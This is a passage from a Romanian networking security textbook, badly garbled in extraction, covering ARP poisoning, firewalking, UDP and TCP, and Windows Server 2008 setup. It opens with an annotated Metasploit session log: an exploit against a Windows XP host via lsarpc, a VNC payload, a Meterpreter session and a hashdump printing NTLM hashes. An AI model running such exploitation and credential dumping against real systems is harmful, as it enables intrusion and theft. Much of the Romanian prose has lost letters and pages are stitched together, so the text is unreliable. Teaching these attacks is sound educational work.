[*] Trying to exploit Windows 5.1
>> exploit // BUG IN EXPLOIT (CONTINUAM)
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-
00c04fd92ef5:0.0@ncacn_np:192.168.128.5[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.128.5[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (327693 bytes)...
[*] Upload completed.
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vnciewer in the background.
[*] VNC Server session 2 opened (192.168.128.2:1875 -> 192.168.128.5:4444)
[*] The DCERPC service did not reply to our request
>> sessions –l // LISTARE SESIUNI DESCHISE
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.128.2:1831 -> 192.168.128.5:4444 // SESIUNE MAI VECHE
2 VNC Server 192.168.128.2:1875 -> 192.168.128.5:4444 // REZULTAT
>> sessions -i 1
[*] Starting interaction with 1...
>> use Priv
Loading extension priv...
success.
>> help // OUTPUT OMIS PENTRU BREVITATE
>> hashdump // DUMP NTLM HASH
Administrator:500:81fc70764e28d07e17306d272a9441bb:1588a8ad682c772251524a40766e9918:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:5890ebd067d1edf9d64624dfdc26c511:5f1756c53701b2d0aa8391848d58914a:::
stormy:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0
:1002:aad3b435b51404eeaad3b435b51404ee:25c43e16e9e62c3f615ee824ab5fd083:::
desti aţia o e tă. Da ă a est lu u u se î tâ plă, este p odus u ata Do“ î t e ele două
staţii i ti ă man-in-the-end).
ARP poisoning este p o esul p i a e staţiile afe tate di t -o eţea o utată o aju ge
să posede i t ă i e o ate î ta ela A‘P. Mai e a t, î lo ul o espo de ţelo fi eşti î t e
di e sele ad ese IP şi ad esele MAC ale elo lalte staţii di a eeaşi eţea, o staţie supusă u ui
atac bazat pe ARP poisoning va avea în tabela ARP doar asocieri între adrese IP ale staţiilo di
a eeaşi eţea lo ală şi o si gu ă ad esă MAC – î ge e al ea a staţiei e a i iţiat ata ul.
Î ele e u ează se va des ie pas u pas i iţie ea u ui astfel de ata , î t -o eţea u
staţii, folosi d utilita ul Cain&Abel (http://www.oxid.it/cain.html). “e do eşte
i te epta ea t afi ului di t e staţiile A şi A de ăt e staţia A ata ato ul .
A3
10.1.1.4
A1 A2
10.1.1.2 10.1.1.3
După po i ea s iffe -ului, u ăto ul pas îl ep ezi tă des ope i ea staţiilo di eţea.
Pentru ca pachetele capturate să poată fi utate ăt e desti aţia o e tă, t e uie să
375 | “ e u i t a t e a eţelei
u oaşte aso ie ile IP-MAC ale staţiilo di eţea, ata ul fii d i posi il fă ă a estea. A est
lu u se ealizează p i li k d eapta şi alege ea opţiu ii „“ a MAC Add esses .
Î ţelesul sele ţiei de ai sus este u ăto ul: t afi ul este i te eptat î t e staţia e a e
ad esa IP . . . şi staţia e a e ad esa IP . . . , î a ele di e ţii. Î a est o e t
dispu e de toate i fo aţiile e esa e i iţie ii ata ului şi de un utilitar foarte puternic, ce va
la sa ata ul p i si pla apăsa e a uto ului „AP‘ .
Dat fii d faptul a i t ă ile î t -o ta elă A‘P e pi ă, se pune problema da ă faza i iţială de
i u da e u pa hete fi ti e t e uie epetată o ti uu. ‘ăspu sul u este hia atât de uşo de
dat pentru ă, deşi soluţia i u dă ii o ti ue a eţelei u pa hete fi ti e asigu ă fu ţio a ea
staţiei ata ato a p o t a spa e t, poate totuşi ea u overhead se ifi ati , u ă ul de
pa hete fi ti e t i ise a ii d u păt atul u ă ului de staţii a ti e.
Implicit, Cain trimite pachete ARP false la fiecare 30 de secunde, timp ce poate fi
o figu at di e iul „Configure . Tot de ai i, se pot s hi a ad esele IP su să şi MAC su să,
î s opul as u de ii ide tităţii ata ato ului.
10.4.2 Firewalking
Firewalking ep ezi tă o etodă de ide tifi a e a egulilo listelo de a es o figu ate pe
u fi e all a e p otejează o eţea „ţi tă . Teh i a folosita ep ezi tă o dez olta e a
algoritmului de „traceroute şi se azează pe o a aliză a pa hetelo IP pe t u a dete i a
da a a estea pot aju ge la siste ul ţi tă p i firewall.
După e u router de ide i te faţa de ieși e a u ui pa het, a esta de e e tează aloa ea
câmpului TTL (Time To Live) di a tetul IP al pa hetului; da ă oua aloa e este ai i ă sau
egală u ze o, routerul a e u ţa la t i ite ea pa hetului şi a t a s ite î apoi ăt e siste ul
su să u pa het ICMP de tip 11 – TTL Expired i t a sit. A est lu u îi o u i ă su sei la e
router a expirat pachetul. Bazându-se pe a est o po ta e t şi pe ipoteza ă u e istă
e hipa e te a e să filt eze t afi ul ICMP pe d u , t a e oute t i ite pa hete o se uti e
ăt e desti aţie i e e tâ d aloa ea â pului TTL a e po ește i iţial de la unu.
Firewalk este p og a ul a e i ple e tează teh i ile e ţio ate a te io pe t u a
ide tifi a p oto oalele şi se i iile pe ise p i t -un firewall. Pentru a porni scanarea,
ata ato ul a e e oie de u ătoa ele i fo aţii:
adresa IP a firewall-ului ce va fi scanat (packet filter);
adresa IP din spatele firewall-ului pe t u a e ifi a egulile ăt e a easta destination host).
378 | ‘ e ţ e l e L o a l e
Retea
Protejata
INTERNET
STATIE
DESTINATIE
FIREWALL ATACATOR
Firewalk funcţio ează t i iţâ d pa hete TCP sau UDP pe po tu ile spe ifi ate de ata ato
cu o valoare TTL cu unu mai mare decât a firewall-ului a e este s a at. Astfel, da ă
e hipa e tul de filt a e pe ite t afi ul, a t a s ite pa hetul ăt e desti aţie u de a esta
a e pi a t i iţâ d î apoi u esaj de tip TTL Expired i t a sit. Da ă firewall-ul nu permite
t afi ul, atu i pa hetul este a u at şi ata ato ul fie u a p i i î apoi niciun ăspu s el ai
adesea , fie a p i i u ăspu s ICMP tip od Destination Unreachable – Communication
Administratively Prohibited . T i iţâ d u u ă de p o e ăt e ad esele IP şi po tu ile
interesante din spatele firewall-ului, şi a alizâ d ăspu su ile, u ata ato poate o ţi e o
ha tă a ACL-urilor definite.
Firewalk 5.0 [gateway ACL scanner]
Usage : firewalk [options] target_gateway metric
[-d 0 - 65535] destination port to use (ramping phase)
[-h] program help
[-i device] interface
[-n] do not resolve IP addresses into hostnames
[-p TCP | UDP] firewalk protocol
[-r] strict RFC adherence
[-S x - y, z] port range to scan
[-s 0 - 65535] source port
[-T 1 - 1000] packet read timeout in ms
[-t 1 - 25] IP time to live
[-v] program version
[-x 1 - 8] expire vector
Cine este...
Robert Kahn este oauto , î p eu ă u Vi t Ce f, al p oto oalelo TCP și IP a e au
de e it p oto oalele fu da e tale î I te et. P oie ta ea elo două p oto oale a a ut î
ede e folosi ea a două i elu i î a e TCP se o upă u se i iile de asigu a e a
o e ti ităţii și a o t olului flu ului. Î p eze t este p eședi tele CNRI Co po atio fo
National Research Initiatives).
11.2 UDP
11.2.1 Caracteristici UDP
UDP (User Datagram Protocol)1 este un protocol de nivel transport construit special
pentru a oferi un serviciu de comunicare cât mai simplu peste IP.
Câteva caracteristici ale UDP-ului sunt:
este u se i iu de tip datag a ă: e e ile de t i ite e de date p i ite de la i elul supe io
sunt tratate independent;
comunicarea are loc fă ă sta ili ea u ei legătu i connectionless : u e istă e a is e de
sta ili e şi te i a e a u ei o e iu i; toate datele su t t i ise î ad ul u ui si gu pa het IP,
a e e e tual a fi supus f ag e tă ii;
u se ga a tează faptul ă datele o aju ge la desti aţie best effort : aju ge ea la desti aţie a
datelo u este a u ţată su sei;
datele t a spo tate su t p otejate de o su ă de o t ol a a te isti ă opţio ală i iţial da
t e ută a e esa ă must)2);
î ă a ea supli e ta ă overhead-ul) introdusă este i i ă: doa o teţi.
Câte a utiliză i tipi e ale UDP-ului sunt în:
se i ii de ezol a e a u elo DN“ : î t e ă ile şi ăspu su ile s u te pot fi ai efi ie t
implementate peste UDP;
fluxuri multimedia: mecanismele complicate de control al fluxului ale TCP-ului ar deprecia
interactivitatea;
se e de fişie e NF“ : a est tip de apli aţii su t î ge e al ulate î eţele lo ale u
pe fo a ţe idi ate a e u e esită e a is ele TCP;
BitTorrent;
a age e tul eţelei “NMP ;
protocoale de rutare (RIP).
Antetul cuprinde:
po t su să - iţi; Î p eu ă u ad esa IP a su sei, a est u ă ide tifi ă î od u i
expeditorul datagramei UDP;
po t desti aţie - iţi; Î p eu ă u ad esa IP a desti aţiei, a est u ă ide tifi ă î od u i
desti aţia do ită pe t u datag a a UDP;
1
http://tools.ietf.org/html/rfc768
2
http://tools.ietf.org/html/rfc1122
382 | ‘ e ţ e l e L o a l e
Porturi
Câ pul aso iat po tu ilo a e iţi, de i alo ile posi ile su t up i se î t e şi .
Po tul este eze at, da este u po t su să pe is da ă p o esul t a s iţăto u aşteaptă
esaje de ăspu s.
Po tu ile up i se î t e şi su t po tu i eze ate aşa zisele „known ports ; pe u
sistem Unix folosirea unuia din aceste po tu i e esită d eptu i p i ilegiate d eptu i de root).
Po tu ile up i se î t e şi su t po tu ile î egist ate folosite de Kazaa, Ja a
RMI Registry, servere SQL, etc.).
Po tu ile up i se î t e şi su t po tu i efe e e şi sunt utilizate ca porturi
te po a e, de o i ei de ăt e lie ţii a e o u i ă u se e ele.
11.3 TCP
11.3.1 Caracteristici TCP
Deoa e e p oto olul IP este de tip datag a ă, utiliza ea lui di e t î apli aţii, a e î
general au nevoie de conexiuni sigure, este mult prea a e oioasă. Di a este oti e peste IP a
fost construit un alt protocol, TCP (Transmission Control Protocol , a e o e tează a este
probleme. TCP1 de i e astfel, alătu i de IP, p oto olul de ază utilizat î I te et. Cele două
protocoale sunt reprezentati e pe t u sti a de p oto oale de fa to e gu e ează
fu ţio a ea I te et-ului.
Alătu i de UDP, TCP se situează pe i elul t a spo t î ie a hia de p oto oale, de i î t e
i elul apli aţie şi i elul eţea. Cu toate ă se azează pe a elaşi p oto ol IP a şi UDP, TCP
fu izează ăt e i elul apli aţie u totul alt tip de se i ii: se i ii o ie tate-conexiune, sigure,
de tip flu de o teţi.
Termenul orientat-conexiune p esupu e ă î t e ele două apli aţii a e o u i ă
utilizâ d TCP t e uie să se sta ileas ă o o e iu e î ai te a t a sfe ul de date să ai ă lo .
A eastă o e iu e u este u a fizi ă i i tuală. Tipul de o e iu e este ase ă ăto u
siste ul de telefo ie lasi ă: o pe soa ă fo ează u u ă şi a ia î o e tul î a e
ealaltă pe soa ă ăspu de se poate î epe o e saţia. Fii d o o e iu e pu t la pu t, u
e istă oţiu ile de broadcast sau multicast.
Transferul sigur de date este asigu at î u ăto ul od:
1
http://tools.ietf.org/html/rfc1122; http://tools.ietf.org/html/rfc793
383 | P r o t o c o a l e d e n i v e l t r a n s p o r t
Apelul socket spe ifi ă p oto olul de i el IP – PF_INET şi p oto olul de i el TCP –
IPPROTO_TCP). Apelul bind spe ifi ă elelalte două o po e te ale tuplului e defi eşte un
socket: ad esa IP şi po tul TCP se egăses î â pu ile st u tu ii addr).
Î ă de la apa iţia TCP şi a i te feţei socket, odelul de o u i aţie utilizat a fost odelul
client-server. Î ad ul a estui odel, u siste eează u socket şi aşteaptă i iţie ea u ei
conexiuni de pe un alt sistem; socketul se hea ă socket în starea listening şi este spe ifi
se e ului, ia siste ul a e i iţiază o e iu ea este lie tul.
Cei doi socketi (socketul lie t şi socketul se e se eează o fo odelului de mai sus.
În continuare, socketul server este plasat în starea listening, ia so ketul lie t a i iţia
o e iu ea. Pe t u se e , se utilizează apelu ile listen şi accept, iar pentru client apelul
connect, ca mai jos:
/* server */
listen (server_sock, 10);
new_sock = accept (server_sock, &cli_addr, &cli_addr_len);
/* client */
connect (client_sock, &serv_addr, &serv_addr_len);
Resetarea conexiunii
E istă situaţii î a e TCP do eşte eseta ea o e iu ii - de e e plu, da ă se soli ită
i iţie ea u ei o e iu i la u po t i e iste t. Î a est az, ealaltă pa te a t i ite u seg e t
cu bitul RST setat pentru a anula solicita ea. O altă situaţie este atu i â d se o stată ă
elălalt apăt al o e iu ii u ăspu de u a u it ti p timeout).
391 | P r o t o c o a l e d e n i v e l t r a n s p o r t
Î tre ări
1. Da ă la u o e t dat a fost e epţio at u pa het u u ă ul de se e ţă ,
e u ă de se e ţă a a ea pa hetul de o fi a e?
1024
1023
1025
1026
12 Anexe
12.1 Anexa 1: Instalare Windows Server 2008
12.1.1 Versiuni
Microsoft Windows Server 2008 a ieşit pe piaţă î ai ulte a ia te, o ie tate sp e a
a ope i o ga ă ât ai la gă de utilizato i, i f ast u tu i şi teh ologii. Î ele e u ează, vor
fi prezentate variantele sub care Windows Server 2008 este disponibil la momentul scrierii
a estei ă ţi:
Windows Server 2008 Web Edition: Co eput a o si plă platfo ă II“ Internet Information
Services apa ilă de a găzdui pagi i şi apli aţii e , ofe i d supo t pe t u se i ii XML1
(eXtensible Markup Language), inclusiv ASP2 (Active Server Pages şi platfo a .NET3.
Windows Server 2008 Standard Edition: Conceput pentru mediul SMB-uri (Small and Medium
Business ; supo tă pa taja ea fişie elo şi a i p i a telo î eţea şi poate lu a u pâ ă la
p o esoa e şi GB ‘AM.
Windows Server 2008 Datacenter Edition: Con eput pe t u i f ast u tu i u e i ţe a i de
se u itate şi edu da ţă şi pe t u siste e u pute e a e de p o esa e. “upo tă pâ ă la de
p o esoa e şi TB ‘AM î a ia ta pe de iţi.
Windows Server 2008 Enterprise Edition: Adresat mediului medium to large business. “upo tă
pâ ă la p o esoa e şi GB ‘AM pe de iţi şi ofe ă se i ii a a sate de clustering4 şi
5
virtualizare .
Windows Storage Server 2008: Co eput a o platfo ă spe ializată pe t u ad i ist a ea NA“
(Network Attached Storage şi opti izat pe t u se i iile de pa taja e de fişie e şi i p i a te
în medii SAN (Storage Area Network)6.
Windows Server 2008 for Itanium-Based Systems: P o esoa ele I tel Ita iu pe de iţi
e esită a eastă e siu e pa ti ula ă de Windows Server 2008 pe sistemele pe care sunt
instalate.
Windows HPC Server 2008: Optimizat pentru sisteme HPC (High Performance Computing).
Poate s ala pâ ă la âte a ii de odu i de p o esa e şi ofe ă etode a a sate de
monitorizare a sistemelor. De asemenea, este specializat î p og a a ea şi dist i ui ea jo -
u ilo de p o esa e, putâ d o u i a deopot i ă u platfo e HPC azate pe Li u .
Windows Server 2008 Standard Without Hyper-V
Windows Server 2008 Enterprise Without Hyper-V
Windows Server 2008 Datacenter Without Hyper-V
Hyper-V7 ep ezi tă u siste de i tualiza e azat pe u h pe iso , pe t u siste e .
Va ia ta fi ală a lui H pe -V a fost i t odusă î dist i uţiile de Windows Server 2008 la
sfâ şitul lui iu ie . Î ai te de la sa e a pu tat u ele de od Vi idia şi a i ulat şi su
denumirea de Windows Server Virtualization.
Un hypervisor este o o po e tă a u ei platfo e de i tualiza e, de u it şi Vi tual
Machine Monitor care permite rularea mai multor sisteme de operare pe acelasi calculator,
simultan.
1
http://www.w3.org/XML/
2
http://www.asp.net/
3
http://www.microsoft.com/NET/
4
http://en.wikipedia.org/wiki/Computer_cluster
5
http://en.wikipedia.org/wiki/Virtualization
6
http://en.wikipedia.org/wiki/Storage_area_network
7
http://www.microsoft.com/windowsserver2008/en/us/hyperv.aspx
400 | ‘ e ţ e l e L o a l e
1
http://en.wikipedia.org/wiki/Computer_cluster
401 | P r o t o c o a l e d e n i v e l t r a n s p o r t
Procesor:
o Minim: 1GHz
o Recomandat: 2 GHz
o Optim: 3GHz sau mai mult
P o eso I tel Ita iu pe t u a ia ta o espu zătoa e de Windows Server 2008
o
Memorie:
o Minim: 512 MB
o Recomandat: 1 GB
o Opti : GB pe t u i stala ea o pletă sau GB pe t u i stala ea Server Core
o Maxim (pe de iţi : GB a ia ta Standard) sau 64 GB (variantele Enterprise şi Datacenter)
o Ma i pe de iţi : GB a ia ta Standard) sau 2 TB (variantele Enterprise, Datacenter şi pe
sistemele Itanium)
“pațiu pe dis :
o Minim: 8 GB
o Recomandat: 40 GB (instala e o pletă sau GB Server Core)
o Opti : GB i stala e o pletă sau GB Server Core şi ai ult
12-1
sistemului.De asemenea, în acest az, t e uie de ifat â pul Automatically activate Windows
he I’ o li e .
4. Î o ti ua e t e uie sele tată a ia ta do ită de i stala e Standard sau Enterprise în varianta
MSDNAA)
12-2
12-3
Directory: Microsoft.PowerShell.Core\FileSystem::C:\Boot
12-4: Lo ația fişierului BCD î tr-o instalare de Windows Server 2008 Standard
405 | P r o t o c o a l e d e n i v e l t r a n s p o r t
Safe Boot:
o Minimal: Po eşte Wi do s î i te faţa g afi ă ulâ d doa u su set i i al de se i ii. Toate
se i iile de eţea su t deza ti ate.
o Alternate Shell: Po este Wi do s î p o ptul de o a dă cmd.exe. “etul de se i ii î ă ate
este, de ase e ea, i i al. Toate se i iile de eţea, p e u şi i te faţa g afi ă, su t deza ti ate.
o Active Directory Repair: Po eşte Wi do s î i te faţa g afi ă, î p eu ă u u set i i al de
se i ii şi Active Directory.
o Networking: Po este Wi do s î i te faţa g afi ă, a şi î odul i i al, da u supo t pe t u
serivi iile de eţea.
No GUI Boot: Deza ti ează afişa ea e a ului de î ă a e splash screen) în timpul boot-ă ii.
Boot Log: “to hează u ju al al p o esului de boot al sistemului în
%SystemRoot%\Ntbtlog.txt
Base Video: Po eşte Wi do s î odul i i al VGA. Driver-ele ideo î ă ate su t ele
sta da d VGA, î lo ul elo spe ifi e plă ii ideo i stalate î siste .
OS Boot Information: Afişează u ele d i e elo şi fişie ele lo e su t î ă ate î ti pul
procesului de boot-are.
Make All Boot Settings Permanent: Nu ţi e e ide ţa setă ilo s hi ate î System
Configuration, de i u se poate e e i la o figu aţia de ază sele tâ d Normal startup la
categoria General, i doa eadu â d fie a e seta e a ual la sta ea i iţială.
12.2.1.3.1 Exe plu de utilizare BCDEdit.exe: Modifi area se ve ţei de por ire
Î u ăto ul e e plu se a ată u se poate spe ifi a se e ţa de po ire astfel încât NT
Loader să po eas ă p i ul, u at de loader-ul cu identificatorul {247945e9-2c49-11dd-
901e-f4acdce939da} e o espu de i stală ii u e te de Windows Server 2008. Se poate
o side a faptul ă NT Loader-ul apa ţi e u ei i stală i de Wi do s XP, spre exemplu:
bcdedit /bootsequence {ntldr} {0f732d04-e6b2-11da-b631-b722247cd703}
Parametrul /timeout permite setarea inclusiv pe valoarea de 0 (zero) secunde, caz în care
e iul u a a fi afişat ia loader-ul implicit va fi automat lansat.
Mai ulte i fo aţii efe itoa e la o eptele pe aza ă uia fu ţio ează BCD p e u şi
o do u e taţie î detaliu pe t u utilizarea lui BCDEdit.exe pot fi găsite î do u e tul de la
ad esa u ătoa e:
http://www.microsoft.com/whdc/system/platform/firmware/bcd.mspx
412 | ‘ e ţ e l e L o a l e
Reviewer’s todos:
- get rid of other todos
- format questions
- check headers (some don’t have styles or numbers)
- change headers to give necesarry spacing
- fix filenames, commands and addresses with z_text_comanda
- fix fucked up wrapping in some z_command_8 blocks
- if possible, review all English terms and apply z_text_italic
- fix invisible images and format them all with z_figura, including description
o also add space after description or space on the bottom of z_figura
- remove hyperlinks from e-mail addresses and web links
- fix nicio, niciun
- update all dynamic fields (references, cross-references...)
- de verificat NEAPARAT referintele!!!!!!